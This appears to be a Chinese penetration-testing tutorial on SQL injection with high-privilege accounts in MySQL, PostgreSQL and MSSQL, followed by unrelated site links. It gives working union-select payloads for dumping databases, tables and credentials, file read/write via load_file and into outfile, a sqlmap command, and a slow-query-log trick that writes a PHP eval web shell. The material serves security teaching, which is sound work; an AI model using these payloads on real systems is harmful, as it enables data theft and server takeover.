25、WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL

文章目录



Access无高权限注入点------只能猜解,而且是暴力猜解;

MYSQL,PostgreSQL,MSSQL(SQL server)高权限注入点------可升级读写(文件)、(命令)执行等。

  • 所谓高权限注入点,指的就是在连接数据库时,所使用的用户(数据库连接用户)具有较高的权限。因为权限划分的缘故。
  • 如果存在高权限注入点,所做的不仅仅是查看数据库的内容,还可以是文件上传、命令执行。

Mysql-root高权限读写注入

  • 读文件(命令行)

    数据库可以调用自身的函数load_file('<file_path>')读取服务器上的文件。payload:select load_file('<file_path>')

  • 写文件(命令行)

    有关函数:outfile()dumpfile()。paylaod:select 'file_content' into outfile '<file_path>'

  • 读文件:union select 1,load_file('d:/w.txt'),3 --+

    在实战中,一般读取数据库配置文件、网站搭建性文件。具体读哪些文件,可以参考load_file 常用路径

    • 获取网站路径方式1:读取中间件的配置文件,例如phpstudy的vhosts.conf文件

    • 获取网站路径方式2:phpinfo()

    • 获取网站路径方式3:报错

  • 写文件:union select 1,'xxx',3 into outfile 'd:/www.txt' --+

会出现有高权限注入点,但是无法读取写入文件的情况------secure-file-priv参数
secure-file-priv参数有三种情况:

  • secure-file-priv=null,不允许读写;
  • secure-file-priv=/tmp/,读写只能发生在tmp目录下;
  • secure-file-priv= ,读写不做限制。

突破方法

  • 注入点需要支持SQL执行环境,若没有就需要借助phpmyadmin或能够直接连上那个对方数据库进行绕过。payload:

    mysql 复制代码
    set global slow_query_log=1; //启用慢日志
    set global slow_query_log_file='shell网站路径';  //保存慢日志的路径,便于用浏览器可以进行访问
    select '<?php @eval($_GET['cmd']);?>' or sleep(11);
  • 支持堆叠注入

PostgreSQL------dba高权限读写注入

php 复制代码
# 测列数
order by 4

# 测回显位
and 1=2 union select 'null',null,null //没报就没有,换下一个
and 1=2 union select null,'null',null //爆出null

# 获取信息
and 1=2 union select null,version(),null // 获取当前数据库版本
and 1=2 union select null,current_user,null //获取当前用户
and 1=2 union select null,current_database(),null //获取当前数据库名

# 获取所有数据库名
and 1=2 union select null,string_agg(datname,','),null from pg_database

# 获取表名
1. and 1=2 union select null,string_agg(tablename,','),null from pg_tables where schemaname='public'
2. and 1=2 union select null,string_agg(relname,','),null from pg_stat_user_tables

# 获取字段名
and 1=2 union select null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'

# 读取数据
and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

-----
# 获取DBA用户(PostgreSQL中的root用户)
and 1=2 union select null,string_agg(username,','),null from pg_user where usesuper is true

参考postgresql注入

Mssql-sa高权限读写注入

python 复制代码
# 测字段数
order by 4

# 测回显位
and 1=2 union all select 'null',null,null //用单引号包裹null,若该位置存在回显位,则页面爆出null

# 获取信息
@@version //获取版本信息
db_name() //当前数据库名字
user,system_user,current_user,user_name //获取当前用户名,四种查询方式
@@SERVERNAME //获取服务器主机信息
and 1=2 union all select null,db_name(),null

# 查表名
and 1=2 union all select null,(select top 1 name from <数据库名>.dbo.sysobjects where xtype='u'),null
and 1=2 union all select null,(select top 1 name from <数据库名>.dbo.sysobjects where xtype='u' and name not in ('manage'(第一个表名))),null //查其他表

# 查字段名
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null

# 查字段内容
and 1=2 union all select null,username,null from manage

使用sqlmap时,一般直接用sqlmap发数据包。讲数据包保存在txt文件中,在参数后面加*告诉sqlmap,你要在这进行注入。

payload:python sqlmap.py -r 1.txt


sql使用手册

相关推荐
叁沐43 分钟前
MySQL 08 详解read view:事务到底是隔离的还是不隔离的?
mysql
爱喝水的小周1 小时前
AJAX vs axios vs fetch
前端·javascript·ajax
Jinxiansen02111 小时前
unplugin-vue-components 最佳实践手册
前端·javascript·vue.js
几道之旅1 小时前
介绍electron
前端·javascript·electron
周胡杰1 小时前
鸿蒙arkts使用关系型数据库,使用DB Browser for SQLite连接和查看数据库数据?使用TaskPool进行频繁数据库操作
前端·数据库·华为·harmonyos·鸿蒙·鸿蒙系统
31535669131 小时前
ClipReader:一个剪贴板英语单词阅读器
前端·后端
玲小珑1 小时前
Next.js 教程系列(十一)数据缓存策略与 Next.js 运行时
前端·next.js
wkj0011 小时前
navicate如何设置数据库引擎
数据库·mysql
ladymorgana1 小时前
【Spring Boot】HikariCP 连接池 YAML 配置详解
spring boot·后端·mysql·连接池·hikaricp
qiyue771 小时前
AI编程专栏(三)- 实战无手写代码,Monorepo结构框架开发
前端·ai编程